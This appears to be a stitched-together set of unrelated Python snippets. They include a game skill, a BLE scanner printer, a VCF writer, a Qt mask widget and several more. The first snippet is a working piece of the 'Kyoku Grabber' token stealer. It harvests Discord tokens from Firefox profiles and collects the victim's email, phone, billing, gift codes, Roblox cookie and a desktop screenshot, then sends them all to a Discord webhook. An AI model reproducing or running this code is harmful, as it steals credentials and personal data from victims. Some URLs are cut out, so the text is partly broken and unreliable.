r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
if os.path.exists((self.roaming + '\\Mozilla\\Firefox\\Profiles')):
for (path, _, files) in os.walk((self.roaming + '\\Mozilla\\Firefox\\Profiles')):
for _file in files:
if (not _file.endswith('.sqlite')):
continue
for line in [x.strip() for x in open(f'{path}\{_file}', errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
def robloxinfo(self, webhook):
try:
if (robo_cookie == 'No Roblox Cookies Found'):
pass
else:
embed = Embed(title='Roblox Info', color=5639644)
headers = {'Cookie': ('.ROBLOSECURITY=' + robo_cookie)}
info = requests.get(' headers=headers).json()
embed.add_field(name='<:roblox_icon:> Name:', value=f"`{info['UserName']}`", inline=True)
embed.add_field(name='<:robux_coin:> Robux:', value=f"`{info['RobuxBalance']}`", inline=True)
embed.set_footer(text='Kyoku Grabber | Created By errias')
embed.add_field(name=' Cookie:', value=f'`{robo_cookie}`', inline=False)
embed.set_thumbnail(url=info['ThumbnailUrl'])
webhook.send(avatar_url=' embed=embed, username='Kyoku Token Stealer')
except Exception:
pass
def upload(self, webhook):
webhook = SyncWebhook.from_url(webhook, session=requests.Session())
for token in self.tokens:
if (token in self.tokens_sent):
pass
val_codes = []
val = ''
nitro = ''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token}
user = requests.get(self.baseurl, headers=headers).json()
payment = requests.get(' headers=headers).json()
gift = requests.get(' headers=headers)
username = ((user['username'] + '#') + user['discriminator'])
discord_id = user['id']
avatar = (f" if (requests.get(f" == 200) else f"
phone = user['phone']
email = user['email']
if user['mfa_enabled']:
mfa = ''
else:
mfa = ''
if (user['premium_type'] == 0):
nitro = ''
elif (user['premium_type'] == 1):
nitro = '`Nitro Classic`'
elif (user['premium_type'] == 2):
nitro = '`Nitro`'
elif (user['premium_type'] == 3):
nitro = '`Nitro Basic`'
else:
nitro = ''
if (payment == []):
methods = ''
else:
methods = ''
for method in payment:
if (method['type'] == 1):
methods += ''
elif (method['type'] == 2):
methods += '<:>'
else:
methods += ''
val += f'''<:1119pepesneakyevil:> **Discord ID:** `{discord_id}`
<:gmail:> **Email:** `{email}`
:mobile_phone: **Phone:** `{phone}`
**2FA:** {mfa}
<a:nitroboost:> **Nitro:** {nitro}
<:billing:> **Billing:** {methods}
<:crown1:> **Token:** `{token}`
[Click to copy!](
'''
if ('code' in gift.text):
codes = json.loads(gift.text)
for code in codes:
val_codes.append((code['code'], code['promotion']['outbound_title']))
if (val_codes == []):
val += f'''
:gift: `No Gift Cards Found`
'''
elif (len(val_codes) >= 3):
num = 0
for (c, t) in val_codes:
num += 1
if (num == 3):
break
val += f'''
:gift: **{t}:**
`{c}`
[Click to copy!](
'''
else:
for (c, t) in val_codes:
val += f'''
:gift: **{t}:**
`{c}`
[Click to copy!](
'''
embed = Embed(title=username, color=5639644)
embed.add_field(name='\u200b', value=(val + '\u200b'), inline=False)
embed.set_footer(text='Kyoku Grabber | Created By errias')
embed.set_thumbnail(url=avatar)
webhook.send(embed=embed, avatar_url=' username='Kyoku Token Stealer')
self.tokens_sent += token
image = ImageGrab.grab(bbox=None, all_screens=True, include_layered_windows=False, xdisplay=None)
image.save((tempfolder + '\\image.png'))
embed2 = Embed(title='Desktop Screenshot', color=5639644)
file = File((tempfolder + '\\image.png'), filename='image.png')
embed2.set_image(url='attachment://image.png')
embed.set_footer(text='Kyoku Grabber | Created By errias')
self.robloxinfo(webhook)
webhook.send(embed=embed2, file=file, username='Kyoku Token Stealer') |
class SilhouetteCameoTool():
def __init__(self, toolholder=1):
if (toolholder is None):
toolholder = 1
self.toolholder = toolholder
def select(self):
return ('J%d' % self.toolholder)
def pressure(self, pressure):
return ('FX%d,%d' % (pressure, self.toolholder))
def speed(self, speed):
return ('!%d,%d' % (speed, self.toolholder))
def depth(self, depth):
return ('TF%d,%d' % (depth, self.toolholder))
def cutter_offset(self, xmm, ymm):
return ('FC%d,%d,%d' % (_mm_2_SU(xmm), _mm_2_SU(ymm), self.toolholder))
def lift(self, lift):
if lift:
return ('FE1,%d' % self.toolholder)
else:
return ('FE0,%d' % self.toolholder)
def sharpen_corners(self, start, end):
return [('FF%d,0,%d' % (start, self.toolholder)), ('FF%d,%d,%d' % (start, end, self.toolholder))] |
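# Illustrative usage sketch (the numeric values are placeholders, not calibrated
# cutter settings); the command strings follow directly from the format strings above:
# tool = SilhouetteCameoTool(toolholder=2)
# tool.select()      -> 'J2'
# tool.pressure(18)  -> 'FX18,2'
# tool.speed(10)     -> '!10,2'
# tool.lift(True)    -> 'FE1,2' |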
def fetch_event_invoices(invoice_status):
# NULL checks on columns need SQLAlchemy's is_()/isnot(); a plain `is None`
# comparison evaluates to a Python bool and silently breaks the filter.
if (invoice_status == 'due'):
event_invoices = EventInvoice.query.filter(((EventInvoice.created_at + datetime.timedelta(days=30)) <= datetime.datetime.now()), EventInvoice.paid_via.is_(None)).all()
elif (invoice_status == 'paid'):
event_invoices = EventInvoice.query.filter(EventInvoice.paid_via.isnot(None)).all()
elif (invoice_status == 'upcoming'):
event_invoices = EventInvoice.query.filter(((EventInvoice.created_at + datetime.timedelta(days=30)) > datetime.datetime.now()), EventInvoice.paid_via.is_(None)).all()
else:
event_invoices = []
return event_invoices |
class Changes(object):
authors = {}
authors_dateinfo = {}
authors_by_email = {}
emails_by_author = {}
def __init__(self, repo, hard):
self.commits = []
interval.set_ref('HEAD')
git_rev_list_p = subprocess.Popen(filter(None, ['git', 'rev-list', '--reverse', '--no-merges', interval.get_since(), interval.get_until(), 'HEAD']), bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
lines = git_rev_list_p.communicate()[0].splitlines()
git_rev_list_p.stdout.close()
if ((git_rev_list_p.returncode == 0) and (len(lines) > 0)):
progress_text = _(PROGRESS_TEXT)
if (repo != None):
progress_text = (('[%s] ' % repo.name) + progress_text)
chunks = (len(lines) // CHANGES_PER_THREAD)
self.commits = ([None] * (chunks if ((len(lines) % CHANGES_PER_THREAD) == 0) else (chunks + 1)))
first_hash = ''
for (i, entry) in enumerate(lines):
if ((i % CHANGES_PER_THREAD) == (CHANGES_PER_THREAD - 1)):
entry = entry.decode('utf-8', 'replace').strip()
second_hash = entry
ChangesThread.create(hard, self, first_hash, second_hash, i)
first_hash = (entry + '..')
if format.is_interactive_format():
terminal.output_progress(progress_text, i, len(lines))
else:
if ((CHANGES_PER_THREAD - 1) != (i % CHANGES_PER_THREAD)):
entry = entry.decode('utf-8', 'replace').strip()
second_hash = entry
ChangesThread.create(hard, self, first_hash, second_hash, i)
for i in range(0, NUM_THREADS):
__thread_lock__.acquire()
for i in range(0, NUM_THREADS):
__thread_lock__.release()
self.commits = [item for sublist in self.commits for item in sublist]
if (len(self.commits) > 0):
if interval.has_interval():
interval.set_ref(self.commits[(- 1)].sha)
self.first_commit_date = datetime.date(int(self.commits[0].date[0:4]), int(self.commits[0].date[5:7]), int(self.commits[0].date[8:10]))
self.last_commit_date = datetime.date(int(self.commits[(- 1)].date[0:4]), int(self.commits[(- 1)].date[5:7]), int(self.commits[(- 1)].date[8:10]))
def __iadd__(self, other):
try:
self.authors.update(other.authors)
self.authors_dateinfo.update(other.authors_dateinfo)
self.authors_by_email.update(other.authors_by_email)
self.emails_by_author.update(other.emails_by_author)
for commit in other.commits:
bisect.insort(self.commits, commit)
if ((not self.commits) and (not other.commits)):
self.commits = []
return self
except AttributeError:
return other
def get_commits(self):
return self.commits
def modify_authorinfo(authors, key, commit):
if (authors.get(key, None) == None):
authors[key] = AuthorInfo()
if commit.get_filediffs():
authors[key].commits += 1
for j in commit.get_filediffs():
authors[key].insertions += j.insertions
authors[key].deletions += j.deletions
def get_authorinfo_list(self):
if (not self.authors):
for i in self.commits:
Changes.modify_authorinfo(self.authors, i.author, i)
return self.authors
def get_authordateinfo_list(self):
if (not self.authors_dateinfo):
for i in self.commits:
Changes.modify_authorinfo(self.authors_dateinfo, (i.date, i.author), i)
return self.authors_dateinfo
def get_latest_author_by_email(self, name):
if (not hasattr(name, 'decode')):
name = str.encode(name)
try:
name = name.decode('unicode_escape', 'ignore')
except UnicodeEncodeError:
pass
return self.authors_by_email[name]
def get_latest_email_by_author(self, name):
return self.emails_by_author[name] |
def average(create: type[Color], colors: Iterable[ColorInput], space: str, premultiplied: bool=True, powerless: bool=False) -> Color:
obj = create(space, [])
cs = obj.CS_MAP[space]
hue_index = (cs.hue_index() if hasattr(cs, 'hue_index') else (- 1))
channels = cs.channels
chan_count = len(channels)
alpha_index = (chan_count - 1)
sums = ([0.0] * chan_count)
totals = ([0.0] * chan_count)
sin = 0.0
cos = 0.0
i = (- 1)
for c in colors:
obj.update(c)
if (powerless and (hue_index >= 0) and (not math.isnan(obj[hue_index])) and obj.is_achromatic()):
obj[hue_index] = math.nan
coords = obj[:]
alpha = coords[(- 1)]
if math.isnan(alpha):
alpha = 1.0
i = 0
for coord in coords:
if (not math.isnan(coord)):
totals[i] += 1
if (i == hue_index):
rad = math.radians(coord)
sin += math.sin(rad)
cos += math.cos(rad)
else:
sums[i] += ((coord * alpha) if (premultiplied and (i != alpha_index)) else coord)
i += 1
if (i == (- 1)):
raise ValueError('At least one color must be provided in order to average colors')
alpha = sums[(- 1)]
alpha_t = totals[(- 1)]
sums[(- 1)] = (math.nan if (not alpha_t) else (alpha / alpha_t))
alpha = sums[(- 1)]
if (math.isnan(alpha) or (alpha in (0.0, 1.0))):
alpha = 1.0
for i in range((chan_count - 1)):
total = totals[i]
if (not total):
sums[i] = math.nan
elif (i == hue_index):
avg_theta = math.degrees(math.atan2((sin / total), (cos / total)))
sums[i] = ((avg_theta + 360) if (avg_theta < 0) else avg_theta)
else:
sums[i] /= ((total * alpha) if premultiplied else total)
return obj.update(space, sums[:(- 1)], sums[(- 1)]) |
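# Minimal usage sketch, assuming `create` is a coloraide-style Color class that
# provides CS_MAP, update() and is_achromatic() as used above; the space and
# input colors are placeholders:
# avg = average(Color, ['red', 'blue'], 'srgb')
# avg.to_string()  # roughly (0.5, 0, 0.5), a purple, with default premultiplied averaging |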
class LeDevicesScanResult(ScanResult):
def __init__(self) -> None:
super().__init__('LE Devices')
self.devices_info = []
def add_device_info(self, info: LeDeviceInfo):
self.devices_info.append(info)
def print(self):
for dev_info in self.devices_info:
print('Addr: ', blue(dev_info.addr), ((('(' + bdaddr_to_company_name(dev_info.addr)) + ')') if (dev_info.addr_type == 'public') else ''))
print('Addr type: ', blue(dev_info.addr_type))
print('Connectable:', (green('True') if dev_info.connectable else red('False')))
print('RSSI: {} dBm'.format(dev_info.rssi))
print('General Access Profile:')
for ad in dev_info.ad_structs:
try:
type_names = gap_type_names[ad.type]
except KeyError:
type_names = ((('0x{:02X} '.format(ad.type) + '(') + red('Unknown')) + ')')
print((INDENT + '{}: '.format(type_names)), end='')
if ((ad.type == COMPLETE_LIST_OF_16_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_16_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
if (len(uuid) == 36):
print(((INDENT * 2) + blue(('0x' + uuid[4:8].upper()))))
else:
print(((INDENT * 2) + blue(uuid)))
elif ((ad.type == COMPLETE_LIST_OF_32_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_32_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
if (len(uuid) == 36):
print(((INDENT * 2) + blue(('0x' + uuid[0:8].upper()))))
else:
print(((INDENT * 2) + blue(uuid)))
elif ((ad.type == COMPLETE_LIST_OF_128_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_128_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
print(((INDENT * 2) + blue(uuid).upper()))
elif (ad.type == SERVICE_DATA_16_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: 0x{}'.format(ad.value[0:(2 * 2)].upper())))
print(((INDENT * 2) + 'Data:'), ad.value[(2 * 2):])
elif (ad.type == SERVICE_DATA_32_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: {}'.format(ad.value[0:(4 * 2)].upper())))
print(((INDENT * 2) + 'Data:'), ad.value[(4 * 2):])
elif (ad.type == SERVICE_DATA_128_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: {}'.format(ad.value[0:(16 * 2)].upper())))
print(((INDENT * 2) + 'Data: '), ad.value[(16 * 2):])
elif (ad.type == FLAGS):
print()
try:
value = bytes.fromhex(ad.value)
print((((INDENT * 2) + 'LE Limited Discoverable Mode\n') if (value[0] & 1) else ''), end='')
print((((INDENT * 2) + 'LE General Discoverable Mode\n') if (value[0] & 2) else ''), end='')
print((((INDENT * 2) + 'BR/EDR Not Supported\n') if (value[0] & 4) else ''), end='')
print((((INDENT * 2) + 'Simultaneous LE + BR/EDR to Same Device Capable (Controller)\n') if (value[0] & 8) else ''), end='')
print((((INDENT * 2) + 'Simultaneous LE + BR/EDR to Same Device Capable (Host)\n') if (value[0] & 16) else ''), end='')
except (ValueError, IndexError) as e:
logger.debug('LeDevicesScanResult.print(), parse ad.type == FLAGS')
print(ad.value, (('(' + red('Raw')) + ')'))
elif (ad.type == MANUFACTURER_SPECIFIC_DATA):
value = bytes.fromhex(ad.value)
company_id = int.from_bytes(value[0:2], 'little', signed=False)
try:
company_name = blue(company_names[company_id])
except KeyError:
company_name = red('Unknown')
if (len(value) >= 2):
print()
print(((INDENT * 2) + 'Company ID:'), '0x{:04X} ({})'.format(company_id, company_name))
try:
print(((INDENT * 2) + 'Data: '), ''.join(['{:02X}'.format(b) for b in value[2:]]))
except IndexError:
print(((INDENT * 2) + 'Data:'), None)
else:
print(value)
elif (ad.type == TX_POWER_LEVEL):
value = int.from_bytes(bytes.fromhex(ad.value), 'little', signed=True)
print(value, 'dBm', '(pathloss {} dBm)'.format((value - dev_info.rssi)))
else:
print(ad.value)
print()
print()
def store(self):
with open(LE_DEVS_SCAN_RESULT_CACHE, 'wb') as result_file:
pickle.dump(self, result_file) |
class Taichi(TreatAs, Skill):
skill_category = ['character', 'active']
def treat_as(self):
cl = self.associated_cards
if (not cl):
return DummyCard
c = cl[0]
if c.is_card(GrazeCard):
return AttackCard
if c.is_card(AttackCard):
return GrazeCard
return DummyCard
def check(self):
cl = self.associated_cards
if ((not cl) or (len(cl) != 1)):
return False
c = cl[0]
if (not (c.is_card(AttackCard) or c.is_card(GrazeCard))):
return False
return ((c.resides_in is not None) and (c.resides_in.type in ('cards', 'showncards'))) |
def write_final_vcf(int_duplication_candidates, inversion_candidates, tandem_duplication_candidates, deletion_candidates, novel_insertion_candidates, breakend_candidates, version, contig_names, contig_lengths, types_to_output, options):
vcf_output = open((options.working_dir + '/variants.vcf'), 'w')
print('##fileformat=VCFv4.2', file=vcf_output)
print('##fileDate={0}'.format(time.strftime('%Y-%m-%d|%I:%M:%S%p|%Z|%z')), file=vcf_output)
print('##source=SVIM-v{0}'.format(version), file=vcf_output)
for (contig_name, contig_length) in zip(contig_names, contig_lengths):
print('##contig=<ID={0},length={1}>'.format(contig_name, contig_length), file=vcf_output)
if ('DEL' in types_to_output):
print('##ALT=<ID=DEL,Description="Deletion">', file=vcf_output)
if ('INV' in types_to_output):
print('##ALT=<ID=INV,Description="Inversion">', file=vcf_output)
if (((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)) or ((not options.interspersed_duplications_as_insertions) and ('DUP:INT' in types_to_output))):
print('##ALT=<ID=DUP,Description="Duplication">', file=vcf_output)
if ((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)):
print('##ALT=<ID=DUP:TANDEM,Description="Tandem Duplication">', file=vcf_output)
if ((not options.interspersed_duplications_as_insertions) and ('DUP:INT' in types_to_output)):
print('##ALT=<ID=DUP:INT,Description="Interspersed Duplication">', file=vcf_output)
if ('INS' in types_to_output):
print('##ALT=<ID=INS,Description="Insertion">', file=vcf_output)
if ('BND' in types_to_output):
print('##ALT=<ID=BND,Description="Breakend">', file=vcf_output)
print('##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">', file=vcf_output)
print('##INFO=<ID=CUTPASTE,Number=0,Type=Flag,Description="Genomic origin of interspersed duplication seems to be deleted">', file=vcf_output)
print('##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">', file=vcf_output)
print('##INFO=<ID=SVLEN,Number=1,Type=Integer,Description="Difference in length between REF and ALT alleles">', file=vcf_output)
print('##INFO=<ID=SUPPORT,Number=1,Type=Integer,Description="Number of reads supporting this variant">', file=vcf_output)
print('##INFO=<ID=STD_SPAN,Number=1,Type=Float,Description="Standard deviation in span of merged SV signatures">', file=vcf_output)
print('##INFO=<ID=STD_POS,Number=1,Type=Float,Description="Standard deviation in position of merged SV signatures">', file=vcf_output)
print('##INFO=<ID=STD_POS1,Number=1,Type=Float,Description="Standard deviation of breakend 1 position">', file=vcf_output)
print('##INFO=<ID=STD_POS2,Number=1,Type=Float,Description="Standard deviation of breakend 2 position">', file=vcf_output)
if options.insertion_sequences:
print('##INFO=<ID=SEQS,Number=.,Type=String,Description="Insertion sequences from all supporting reads">', file=vcf_output)
if options.read_names:
print('##INFO=<ID=READS,Number=.,Type=String,Description="Names of all supporting reads">', file=vcf_output)
if options.zmws:
print('##INFO=<ID=ZMWS,Number=1,Type=Integer,Description="Number of supporting ZMWs (PacBio only)">', file=vcf_output)
print('##FILTER=<ID=hom_ref,Description="Genotype is homozygous reference">', file=vcf_output)
print('##FILTER=<ID=not_fully_covered,Description="Tandem duplication is not fully covered by a single read">', file=vcf_output)
print('##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">', file=vcf_output)
print('##FORMAT=<ID=DP,Number=1,Type=Integer,Description="Read depth">', file=vcf_output)
print('##FORMAT=<ID=AD,Number=R,Type=Integer,Description="Read depth for each allele">', file=vcf_output)
if ((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)):
print('##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number of tandem duplication (e.g. 2 for one additional copy)">', file=vcf_output)
print(('#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t' + options.sample), file=vcf_output)
sequence_alleles = (not options.symbolic_alleles)
if sequence_alleles:
try:
reference = FastaFile(options.genome)
except ValueError:
logging.warning('The given reference genome is missing an index file ({path}.fai). Sequence alleles cannot be retrieved.'.format(path=options.genome))
sequence_alleles = False
except IOError:
logging.warning('The given reference genome is missing ({path}). Sequence alleles cannot be retrieved.'.format(path=options.genome))
sequence_alleles = False
else:
reference = None
vcf_entries = []
if ('DEL' in types_to_output):
for candidate in deletion_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry(sequence_alleles, reference, options.read_names, options.zmws), 'DEL'))
if ('INV' in types_to_output):
for candidate in inversion_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry(sequence_alleles, reference, options.read_names, options.zmws), 'INV'))
if ('INS' in types_to_output):
for candidate in novel_insertion_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry(sequence_alleles, reference, options.insertion_sequences, options.read_names, options.zmws), 'INS'))
if options.tandem_duplications_as_insertions:
if ('INS' in types_to_output):
for candidate in tandem_duplication_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry_as_ins(sequence_alleles, reference, options.read_names, options.zmws), 'INS'))
elif ('DUP:TANDEM' in types_to_output):
for candidate in tandem_duplication_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry_as_dup(options.read_names, options.zmws), 'DUP_TANDEM'))
if options.interspersed_duplications_as_insertions:
if ('INS' in types_to_output):
for candidate in int_duplication_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry_as_ins(sequence_alleles, reference, options.read_names, options.zmws), 'INS'))
elif ('DUP:INT' in types_to_output):
for candidate in int_duplication_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry_as_dup(options.read_names, options.zmws), 'DUP_INT'))
if ('BND' in types_to_output):
for candidate in breakend_candidates:
vcf_entries.append(((candidate.get_source()[0], candidate.get_source()[1], (candidate.get_source()[1] + 1)), candidate.get_vcf_entry(options.read_names, options.zmws), 'BND'))
vcf_entries.append(((candidate.get_destination()[0], candidate.get_destination()[1], (candidate.get_destination()[1] + 1)), candidate.get_vcf_entry_reverse(options.read_names, options.zmws), 'BND'))
if sequence_alleles:
reference.close()
svtype_counter = defaultdict(int)
for (source, entry, svtype) in sorted_nicely(vcf_entries):
variant_id = 'svim.{svtype}.{number}'.format(svtype=svtype, number=(svtype_counter[svtype] + 1))
entry_with_id = entry.replace('PLACEHOLDERFORID', variant_id, 1)
svtype_counter[svtype] += 1
print(entry_with_id, file=vcf_output)
vcf_output.close() |
class qwEditMask(QtWidgets.QWidget):
valueChanged = pyqtSignal(int)
def __init__(self, parent=None):
super().__init__(parent)
self.__changeEnCours = False
self.__nbAxes = 6
self.frame = QtWidgets.QFrame()
self.frame.setMinimumSize(QtCore.QSize(127, 19))
self.frame.setMaximumSize(QtCore.QSize(127, 19))
self.frame.setObjectName('frame')
self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(2)
self.horizontalLayout.setObjectName('horizontalLayout')
self.chk = []
for i in range(6):
self.chk.append(QtWidgets.QCheckBox(self.frame))
self.chk[i].setLayoutDirection(QtCore.Qt.RightToLeft)
self.chk[i].setText('')
self.chk[i].setObjectName('chk{}'.format(i))
self.horizontalLayout.addWidget(self.chk[i])
self.chk[i].stateChanged.connect(self.chkStateChange)
self.lneMask = QtWidgets.QLineEdit(self.frame)
self.lneMask.setMinimumSize(QtCore.QSize(31, 19))
self.lneMask.setMaximumSize(QtCore.QSize(31, 19))
self.lneMask.setAlignment(((QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing) | QtCore.Qt.AlignVCenter))
self.lneMask.setObjectName('lneMask')
self.lneMask.setText('0')
validator = QIntValidator(0, 63, self)
self.lneMask.setValidator(validator)
self.horizontalLayout.addWidget(self.lneMask)
self.lneMask.textChanged.connect(self.lneTextChanged)
self.setLayout(self.horizontalLayout)
(int)
def chkStateChange(self, value):
if (not self.__changeEnCours):
self.__changeEnCours = True
newVal = 0
for i in range(6):
if self.chk[i].isChecked():
newVal += (2 ** i)
self.lneMask.setText(format(newVal))
self.valueChanged.emit(newVal)
self.__changeEnCours = False
(str)
def lneTextChanged(self, txt: str):
if (not self.__changeEnCours):
self.__changeEnCours = True
try:
newVal = int(txt)
except ValueError as e:
self.lneMask.setText('0')
newVal = 0
for i in range(6):
if (newVal & (2 ** i)):
self.chk[i].setCheckState(Qt.Checked)
else:
self.chk[i].setCheckState(Qt.Unchecked)
self.valueChanged.emit(newVal)
self.__changeEnCours = False
()
def getValue(self):
return int(self.lneMask.text())
(int)
def setValue(self, val: int):
self.lneMask.setText(format(val))
value = QtCore.pyqtProperty(int, fget=getValue, fset=setValue)
()
def getNbAxes(self):
return self.__nbAxes
(int)
def setNbAxes(self, val: int):
if ((val < 3) or (val > 6)):
raise RuntimeError(self.tr('The number of axis should be between 3 and 6!'))
self.__nbAxes = val
for i in range(6):
if (i < val):
self.chk[i].setEnabled(True)
else:
self.chk[i].setEnabled(False)
nbAxes = QtCore.pyqtProperty(int, fget=getNbAxes, fset=setNbAxes) |
def test_extract_specified_datetime_features(df_datetime, df_datetime_transformed):
X = DatetimeFeatures(features_to_extract=['semester', 'week']).fit_transform(df_datetime)
pd.testing.assert_frame_equal(X, df_datetime_transformed[(vars_non_dt + [((var + '_') + feat) for var in vars_dt for feat in ['semester', 'week']])], check_dtype=False)
X = DatetimeFeatures(features_to_extract=['hour', 'day_of_week']).fit_transform(df_datetime)
pd.testing.assert_frame_equal(X, df_datetime_transformed[(vars_non_dt + [((var + '_') + feat) for var in vars_dt for feat in ['hour', 'day_of_week']])], check_dtype=False) |
def gen_sites(desired_site_type):
db = Database(util.get_db_root(), util.get_part())
grid = db.grid()
for tile_name in sorted(grid.tiles()):
loc = grid.loc_of_tilename(tile_name)
gridinfo = grid.gridinfo_at_loc(loc)
for (site, site_type) in gridinfo.sites.items():
if (site_type == desired_site_type):
(yield site) |
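# Minimal usage sketch ('SLICEL' is just an example site type); gen_sites is a
# generator, so results can be streamed or collected lazily:
# slicel_sites = list(gen_sites('SLICEL')) |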
class ABI():
def __init__(self, *args, **kwargs):
self.contract = kwargs['contract']
self.proj_path = kwargs['proj_path']
self.constructor = Method(**kwargs['Constructor'])
self.payable = kwargs['payable']
self.methods = [Method(**method) for method in kwargs['Methods'].values()]
compiled_json_path = os.path.join(self.proj_path, 'build', 'contracts', '{}.json'.format(self.contract.name))
with open(compiled_json_path) as compiled_json_f:
compiled_json = json.load(compiled_json_f)
abi_json = compiled_json['abi']
for item in abi_json:
if (item['type'] == 'fallback'):
self.methods.append(Method(Name=Method.FALLBACK, ID=None, Const=False, Inputs=None, Outputs=None))
if item['payable']:
self.payable[Method.FALLBACK] = True
else:
self.payable[Method.FALLBACK] = False
self.methods_by_name = dict()
self.methods_by_idd = dict()
for method in self.methods:
self.methods_by_name[method.name] = method
self.methods_by_idd[method.idd] = method |
class FlicketPost(PaginatedAPIMixin, Base):
__tablename__ = 'flicket_post'
id = db.Column(db.Integer, primary_key=True)
ticket_id = db.Column(db.Integer, db.ForeignKey(FlicketTicket.id))
ticket = db.relationship(FlicketTicket, back_populates='posts')
content = db.Column(db.String(field_size['content_max_length']))
user_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
user = db.relationship(FlicketUser, foreign_keys='FlicketPost.user_id')
date_added = db.Column(db.DateTime())
date_modified = db.Column(db.DateTime())
modified_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
modified = db.relationship(FlicketUser, foreign_keys='FlicketPost.modified_id')
hours = db.Column(db.Numeric(10, 2), server_default='0')
uploads = db.relationship('FlicketUploads', primaryjoin='and_(FlicketPost.id == FlicketUploads.posts_id)')
actions = db.relationship('FlicketAction', primaryjoin='FlicketPost.id == FlicketAction.post_id')
def to_dict(self):
data = {'id': self.id, 'content': self.content, 'date_added': self.date_added, 'date_modified': self.date_modified, 'ticket_id': self.ticket_id, 'user_id': self.user_id, 'links': {'self': (app.config['base_url'] + url_for('bp_api.get_post', id=self.id)), 'created_by': (app.config['base_url'] + url_for('bp_api.get_user', id=self.user_id)), 'posts': (app.config['base_url'] + url_for('bp_api.get_posts', ticket_id=self.ticket_id))}}
return data
def __repr__(self):
return '<FlicketPost: id={}, ticket_id={}, content={}>'.format(self.id, self.ticket_id, self.content) |
class Client(UMsgPacker):
def __init__(self, host, port, connection_handler_class=None):
if DEBUG:
sys.stderr.write(('Connecting to server at: %s (%s)\n' % (host, port)))
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((host, port))
if connection_handler_class:
connection_handler = self.connection_handler = connection_handler_class(self._sock)
connection_handler.start()
def get_host_port(self):
try:
return self._sock.getsockname()
except:
return (None, None)
def is_alive(self):
try:
self._sock.getsockname()
return True
except:
return False
def send(self, obj):
s = self._sock
if (s is None):
raise RuntimeError('Connection already closed')
self._sock.sendall(self.pack_obj(obj))
def shutdown(self):
s = self._sock
if (self._sock is None):
return
self._sock = None
try:
s.shutdown(socket.SHUT_RDWR)
except:
pass
try:
s.close()
except:
pass |
class Param():
def __init__(self, defs):
self._defs = defs
self._type = None
if ((self.type.values == [False, True]) or (self.type.values == [True, False])):
self._type = Bool(self)
# Exposed as read-only properties; they are accessed as attributes
# (self.name, self.type, self.python_type, ...) throughout the class.
@property
def name(self):
return self._defs.get('name')
@property
def documentation(self):
return cleanup(self._defs.get('documentation', ''))
@property
def python_default(self):
return repr(self.type.python_default).replace("'", '"')
@property
def yaml_default(self):
return self.type.yaml_default
@property
def type(self):
if (self._type is None):
t = self._defs.get('to')
if t.startswith('No'):
t = 'Bool'
if (('colour' in self.name) and (t == 'stringarray')):
t = 'ColourList'
t = t.replace('array', 'List')
t = (t[0].upper() + t[1:])
if (('values' in self._defs) or (t in ENUMS)):
t = 'Enum'
if self._defs.get('option'):
t = 'Enum'
if (('latitude' in self.name) and (t != 'String')):
t = 'Latitude'
if (('longitude' in self.name) and (t != 'String')):
t = 'Longitude'
if (t not in globals()):
print(t, self.name, file=sys.stderr)
self._type = globals().get(t, String)(self)
return self._type
@property
def python_values(self):
values = self.type.values
if (values is not None):
return ', '.join([repr(x).replace("'", '"') for x in values])
return self.python_type
@property
def yaml_values(self):
return self.type.values
@property
def yaml_type(self):
return self.type.yaml_type
@property
def python_type(self):
return self.type.python_type
@property
def json_schema(self):
return self.type.json_schema |
class Migration(migrations.Migration):
dependencies = [('frontend', '0075_auto__2012')]
